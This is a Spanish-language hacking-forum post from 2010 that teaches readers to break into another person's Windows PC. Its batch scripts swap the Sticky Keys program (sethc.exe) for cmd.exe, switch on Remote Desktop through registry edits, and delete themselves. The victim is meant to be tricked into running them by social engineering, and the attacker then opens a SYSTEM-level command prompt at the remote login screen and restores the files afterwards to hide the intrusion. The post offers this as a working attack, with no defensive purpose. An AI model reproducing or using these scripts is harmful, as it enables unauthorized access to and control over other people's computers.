Hackea una Pc Con Escritorio Remoto de Windows By ZinzerLing

Ver el tema anterior Ver el tema siguiente Ir abajo

Hackea una Pc Con Escritorio Remoto de Windows By ZinzerLing

Mensaje  -ILO-ChuzO™ el Jue Ago 12, 2010 2:16 pm

Hola amigos de [T]eam [R]aptoreS Por Hay me pedian como hackear una pc ps tengo este trucaso hay les va

Hackear por Escritorio Remoto de Windows

1)Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
remoto)abierto, si es que tiene el puerto habilitado seguir el paso 2), si es que el puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):

2)Crear un batch que haga los siguiente:
Código:

echo off
title .
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
del %0
exit

Este batch lo que hace es crearnos un agujero para poder pasar. Setch es el programita que inicia cuando presionamos 5 veses Shift. Tambien es posible utilizar Sethc.exe en el escritorio Remoto de Windows.
Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrira el paso
y el batch se autoborrara.

2.1)Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.
Código:

echo off
title .
cls
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
del %0
exit

Y esto se lo enviamos ha la victima de alguna forma y al momento de abrirlo nos habilitara el
"Escritorio Remoto de Windows" y nos abrira el paso y el Batch se AutoBorrara.

3)Luego abrimos Inicio/programas/Accesorios/comunicaciones/ConeXion a escritorio remoto
Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:
Equipo:1.2.3.4 <- Direcciona IP de la victima
Nombre de Usuario: <-No ponemos nada lo dejamos Vacio
Contraseña: <-Lo dejamos vacio.
Dominio: <-Lo dejamos vacio.

Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"

4)Luego click en conectar.

5)Cuando nos salga la ventanita pidiendo USER/PASS presionamos 5 veses SHIFT y nos saldra la ventanita de DOS en el equipo remoto y STICKYKEYS en nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que no nos moleste.

6)Ahora tenemos acceso a la raiz osea como SYSTEM (NT AUTHORITY\SYSTEM) teniendo es DOS en la mano, podemos iniciar algunos servicios como ser el telnet, o podemos modificar algunas cosas de su PC. (Esto si quieren, inicien: Compmgmt.msc).

7)Para finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que hize una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las cosas como estaban.
Código:

copy "c:\windows\system32\setch.zzz" "c:\windows\system32\setch.exe"
del "c:\windows\system32\setch.zzz"


Microsoft creo "Escritorio Remoto de Windows" para que lo Explotemos
y lo usemos cuando no tengamos un troyano ha mano. (Claro que tambien es una herramienta util..)

EXPLICACION DEL MANUAL.
Cuando enciendes un ordenador, normalmente pide un user y un pass, se podría cambiando los valores de CMD por StickyKeys, cuando estas para meter la pass, pulsas 5 veces shift, y se abriría CMD, ya desde ahí podrías ejecutar servicios, etc...
Con ingenieria social intentariamos colar los .bat
Por ejemplo, quieres entrar al de tu amigo (uno que se confie), le pasas los bats, te haces con su ip, lo intentas jeje
avatar
-ILO-ChuzO™
Admin
Admin

Mensajes : 83
Puntos : 194
Fecha de inscripción : 07/07/2010
Edad : 23
Localización : ILO

Ver perfil de usuario http://team-raptores.tk/

Volver arriba Ir abajo

Ver el tema anterior Ver el tema siguiente Volver arriba

- Temas similares

 
Permisos de este foro:
No puedes responder a temas en este foro.